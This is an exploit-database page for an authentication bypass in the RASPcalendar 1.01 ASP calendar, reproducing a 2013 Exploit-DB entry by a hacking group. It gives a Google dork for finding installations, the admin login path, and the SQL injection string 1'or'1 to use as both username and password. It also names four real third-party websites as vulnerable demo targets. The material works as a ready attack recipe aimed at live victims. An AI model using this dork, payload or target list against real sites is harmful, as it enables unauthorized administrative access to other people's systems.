header-logo
Suggest Exploit
vendor:
RASPcalendar
by:
Hackeri-AL
7,5
CVSS
HIGH
Admin Login Vlunerabilities
287
CWE
Product Name: RASPcalendar
Affected Version From: 1.01
Affected Version To: 1.01
Patch Exists: NO
Related CWE: N/A
CPE: a:rttucson:raspcalendar:1.01
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2013

RASPcalendar 1.01 [ASP] Admin Login Vlunerabilities

RASPcalendar 1.01 is vulnerable to an authentication bypass vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This will allow the attacker to bypass authentication and gain access to the application.

Mitigation:

Ensure that authentication is properly implemented and enforced.
Source

Exploit-DB raw data:

---------------------------------------------------
RASPcalendar 1.01 [ASP] Admin Login Vlunerabilities
---------------------------------------------------
Author          : Hackeri-AL
Date            : 06-11-2013
Vendor Homepage : http://www.rttucson.com/files.html
Software link   : http://www.rttucson.com/RASPcalendar.zip
Verison         : 1.01
Tested On       : Windows XP
------------------------------------------------------------

Google Dork: allinurl:RASPcalendar "powered by RASPcalendar"

------------------------------------------------------------

Example  : http://www.usfim.it/RASPcalendar/
         : http://site.com/events
         : http://site.com/calendar
         : etc...

Go to    : http://www.usfim.it/RASPcalendar/admin/

UserName : 1'or'1
PassWord : 1'or'1

Login Success Fully :D

------------------------------------------------------------

Vuln sites demo :

http://www.usfim.it/RASPcalendar/admin
http://www.davemitchellassociates.com/events/admin
http://www.bradandrebecca.com/Calendar/admin
http://www.hlubline.com/pt/calendar/admin

------------------------------------------------------------

Found By Hackeri-AL , UAH-Crew Group 2009-2013

UNITED ALBANIAN HACKERS , Thnx to LoocK3D & b4cKd00r ~

[~] Legends Of Albania

------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR